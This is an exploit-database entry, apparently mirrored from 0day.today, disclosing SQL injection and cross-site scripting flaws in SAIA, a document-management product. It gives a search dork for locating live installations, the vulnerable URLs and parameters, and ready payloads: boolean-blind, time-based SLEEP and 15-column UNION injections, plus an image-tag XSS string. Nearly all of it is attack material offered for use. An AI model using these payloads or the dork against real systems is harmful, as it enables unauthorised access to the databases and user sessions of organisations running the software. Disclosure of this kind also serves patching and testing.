Share
## https://sploitus.com/exploit?id=1337DAY-ID-34153
################################
# Exploit Title: SAIA (Software Gestion Documental) SQL Injection & XSS Vulnerability
# D0rk: intext:"Todos los derechos reservados CERO K"
# Exploit Author: n4pst3r
# Vendor Homepage: https://www.cerok.co/
# Tested on: Windows 10, Debian 9
################################
---------------------------------------------------------
SQLi:
http://localhost/path/saia/pantallas/buscador_principal.php?idbusqueda=[SQLi]&cmd=resetall
http://localhost/path/saia/noticia_index/mostrar_noticia.php?idnoticia_index=[SQLi]
Response:
Parameter: idbusqueda (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idbusqueda=24 AND 7287=7287&cmd=resetall
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: idbusqueda=24 AND (SELECT 7591 FROM (SELECT(SLEEP(5)))Dnrp)&cmd=resetall
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: idbusqueda=-3640 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a716a71,0x4c76476b62684f4147666
84c426c745774496d596c65494b486371636149787269794354564b6551,0x716a767171),NULL,NULL-- treG&cmd=resetall
XSS:
https://localhost/path/saia/index.php?texto_salir=[XSS]
Payload: <img src=xss onerror=alert("XSS")>
# 0day.today [2020-03-30] #